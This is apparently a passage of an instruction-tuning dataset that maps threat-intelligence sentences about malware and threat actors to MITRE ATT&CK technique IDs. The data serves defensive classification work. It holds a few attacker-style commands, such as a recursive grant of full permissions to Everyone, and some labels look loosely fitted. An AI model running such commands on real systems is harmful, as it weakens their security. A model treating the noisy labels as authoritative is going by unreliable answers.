Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This ticket can then be used to perform Pass the Ticket attacks.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Though this is unsophisticated, a remote shell does provide a highly flexible and powerful means of remote access in the hands of a skilled attacker### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to identify the MAC address on an infected host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Year Country Industry Malware 2014 Vietnam Network Security WINDSHIELD 2014 Germany Manufacturing WINDSHIELD 2015 Vietnam Media WINDSHIELD 2016 Philippines Consumer products KOMPROGO WINDSHIELD SOUNDBITE BEACON   2016 Vietnam Banking WINDSHIELD 2016 Philippines Technology Infrastructure WINDSHIELD 2016 China Hospitality WINDSHIELD 2016 Vietnam Media WINDSHIELD 2016 United States Consumer Products WINDSHIELD PHOREAL BEACON SOUNDBITE Table 1: APT32 Private Sector Targeting Identified by FireEye APT32 Interest in Political Influence and Foreign Governments In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea collects address book information from Outlook.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also steal code signing materials directly from a compromised third-party.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework., icacls . /grant Everyone:F /T /C /Q### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has been observed loading several APIs associated with Pass the Hash.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK used a proxy server between victims and the C2 server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: SecureWorks) In multiple instances, CTU researchers observed artifacts from unsuccessful attempts to create a web shell on web-accessible JBOSS-based service desk software, followed by use of a functional shell to gain access to the environment### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has cleared select event log entries.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has created Registry Run keys to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HttpBrowser's executable code may be obfuscated through structured exception handling and return-oriented programming### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has used get_tasklist to discover processes on the compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has leveraged rundll32.exe to execute malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has infected victim machines through compromised websites and exploit kits.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Versions of Babuk have been packed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke steals user files from removable media with file extensions and keywords that match a predefined list.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell can browse the file system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Domain Accounts, compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Register the RUN key in the registry below, so that the VBS file is executed every time the machine starts### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda checks for the existence of a Registry key and if it contains certain values.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has also used its backdoors to automatically list interesting files found on a system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Table 2 Sandbox evasion checks in the C# variant of RogueRobin Like the original version, the C# variant of RogueRobin uses DNS tunneling to communicate with its C2 server using a variety of different DNS query types### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis exploits a security vulnerability to load a fake DLL and execute its code.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also has a command to spawn a command shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,to bypass existing defenses within the environment.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers .### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used HTTP requests for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GeminiDuke collects information on running processes and environment variables from the victim.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used tools to identify the user of a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed to hook network APIs to monitor network traffic.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component can change the timestamp of files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, this file keeps track of the user’s last 500 commands.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example of decoded keylogger output### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 has compromised domains to use for C2.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger can obtain information about the victim usernames.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specifically, the following subkeys have been known to be possibly vulnerable to abuse: * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell has used SchTasks for execution.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore has the capability to download and activate additional modules for execution.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LOWBALL command and control occurs via HTTPS over port 443.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With SYSTEM access, the tools/utilities such as Mimikatz, Reg, and secretsdump.py can be used to extract the cached credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has been delivered via malicious links in phishing emails.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most strings in USBStealer are encrypted using 3DES and XOR and reversed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN gathers the local IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to directly inject its code into the web browser process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,zwShell has established persistence by adding itself as a new service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can use tasklist to gather information about the process running on the infected system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has acquired domains to establish credential harvesting pages, often spoofing the target organization and using free top level domains .TK, .ML, .GA, .CF, and .GQ.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke can create a process on a compromised host.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use signed loaders to evade detection.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can download files onto the victim.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used scheduled tasks to execute malicious PowerShell code on remote systems.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 has used multiple variants of DNS Calculation including multiplying the first two octets of an IP address and adding the third octet to that value in order to get a resulting command and control port.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of active and listening connections by using the command netstat -nao as well as a list of available network mappings with net use.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API .### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may compromise the integrity of security solutions by causing notable events to go unreported.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ps ### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used sticky keys to launch a command prompt.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has executed hidden PowerShell windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When this occurs, the process also takes on the security context associated with the new token.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 enables the Remote Desktop Protocol for persistence.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred can delete files from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note that the username could be a small joke on the attackers’ part regarding the attribution to FIN7### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* **Note:** The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker can use WMI to delete Shadow Volumes.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also can uninstall scripts and delete files to cover its track.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali can use DLL side-loading to load malicious DLLs into legitimate executables.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Socksbot creates a suspended svchost process and injects its DLL into it.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These bits are indicated with an ""s"" instead of an ""x"" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 file or via shorthand naming, chmod u+s file.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit supports peer connections.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse mmc.exe to proxy execution of malicious .msc files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used malicious e-mail attachments to deliver malware.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro has named malicious browser extensions and update files to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has staged archived files in a temporary directory prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has used Tor for C2 communication.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After Comnie has been copied to the %TEMP% directory, it will look for the presence of the ‘DQuit.tmp’ file in this path### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution .### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a command to retrieve files from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM has used the Windows Management Instrumentation tool to enumerate infected machines.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has installed web shells on exploited Microsoft Exchange servers.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used tools such as NBTscan to enumerate network shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has used HTTP for communications with command and control servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information allows a threat actor to determine if their messages were delivered, which users are more susceptible to opening them, and basic information regarding the target’s operating system and e-mail client (or browser)### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commercial and open source products can be leveraged with capabilities such as passive network tapping , network traffic modification Adversary-in-the-Middle , keystroke injection , kernel memory reading via DMA , addition of new wireless access to an existing network , and others.### Assistant: T1200: Hardware Additions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack sets up a Registry Run key to establish a persistence mechanism.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY has used encrypted strings in its installer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used different versions of Mimikatz to obtain credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is done for the sake of evading defenses and observation.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc automatically collects data about the victim and sends it to the control server.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use WinRM to execute a payload on a remote host.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot may use ipconfig /all to gather system network configuration details.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are multiple ways an adversary may escape to a host environment.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper collects the victim username and sends it to the C2 server.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has used compromised VPN accounts.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can upload, download, and execute files on the victim.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Finally, the first DLL adds the registry key “SysRat,” at SoftWare\Microsoft\Windows\CurrentVersion\Run, to ensure the malware is executed at startup### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used xmrig to mine cryptocurrency.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,regsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry.   The script attempts to load the malicious module using regsvr with the run function.  Procmon shows the malicious module loaded to the Avast process### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck clears event logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The main purpose of the IGT tool is to make an inventory of the system, saving information from the network interfaces and addresses, credentials belonging to the Domain and database server, services being run from the OS and everything that could help the Poseidon Group make its attack more customized to its victim### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The HandlePP::getClientID method uses the following environment variables: Figure 11. Serial number Figure 12. Hardware UUID Figure 13. MAC address Figure 14. Randomly generated UUID For the initial information packet, the backdoor also collects the following: Figure 15. OS version Running getpwuid ->pw_name , scutil – -get ComputerName, and uname –m will provide the following returns respectively: Mac OSX 10.12### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus can download files from remote servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape itself is obfuscated and uses obfuscated API calls.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has been observed collecting system time from victim machines.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has searched for unsecured AWS credentials and Docker API credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook is capable of spawning a Windows command shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete's main backdoor Machete is also written in Python.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also Upload Malware and have the link target point to malware for download/execution by the user.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie establishes persistence via a .lnk file in the victim’s startup path.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has used obfuscated VBA macros for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware attempts to maintain persistence by saving itself in the Start menu folder or by adding a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas captures screenshots based on specific keywords in the window’s title.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Internal proxy connections may use common peer-to-peer networking protocols, such as SMB, to better blend in with the environment.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On October 10, 2017, Kaspersky Lab’s advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has detected a target system’s OS version and system volume information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc uses HTTP over SSL to communicate commands with the control server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used WMIC to execute remote commands.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa has exploited CVE-2018-0798 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can also embed information within document footers.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has sent collected information to the C2 via HTTP POST request.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to send information staged on a compromised host externally to C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Socksbot can take screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can use TCP in C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, in order to kick off the execution of the malware the attacker uses a batch script which executes the malware, but the batch script does more than simply initiate execution of the malware### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has taken advantage of a known vulnerability in Microsoft Word to execute code.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The current version, HawkEye Reborn v9 has been modified from earlier versions and heavily obfuscated to make analysis more difficult.The email campaigns that have been observed feature characteristics that are consistent with what is commonly seen with malspam campaigns, with the emails purporting to be associated with various documents such as invoices, bills of materials, order confirmations, and other corporate functions### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilGrab has the capability to capture keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has masked executables with document file icons including Word and Adobe PDF.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Table 3: FELIXROOT backdoor parameters Cryptography All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot collects local files and information from the victim’s local machine.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's has a plugin that is capable of recording audio using available input sound devices.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERTON has the ability to dump 